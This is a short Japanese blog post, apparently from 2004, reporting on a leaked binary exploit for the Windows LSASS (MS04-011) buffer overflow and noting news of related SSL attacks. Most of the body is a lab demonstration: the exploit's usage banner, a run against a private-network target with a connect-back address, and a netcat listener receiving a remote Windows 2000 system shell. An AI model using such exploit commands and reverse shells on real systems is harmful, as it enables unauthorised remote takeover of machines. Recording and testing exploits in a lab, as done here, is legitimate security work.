Binaryが某所に投稿されてますな。結局コンパイルできずにいたのでその放置気味だったけど...k-otikベースのものらしい。日本語もSP4だと下のようにスカッと決まるが、SP3だと再起動しちゃいますね。ちなみにこのファイルと同じ階層には今までの攻撃ツールが転がっていますねぇ。

• [Full-Disclosure] LSASS exploit win32 binary

攻

C:\temp\RLsasrv>RLsasrv.exe
Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit
 Bug discovered by eEye
 Code by sbaa (sysop sbaa 3322 org) 2004/04/24 ver 0.1
 Usage:
 RLsasrv 0 targetip [Port ConnectBackIP] ----> attack 2k
 RLsasrv 1 targetip [Port ConnectBackIP] ----> attack xp

C:\temp\RLsasrv>RLsasrv 0 192.168.20.20  31000 192.168.20.10
shellcode size 316

受

C:\>nc -l -p 31000
]
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

追記：

• ISS、Windows SSL脆弱性に対する攻撃を確認〜Windows Updateを呼びかけ 〜ラックは日本語版WindowsでLSAS脆弱性の再現に成功(INTERNETWatch)
• Attackers Use SSL Exploit to Target Australian Banks(netcfaft.com)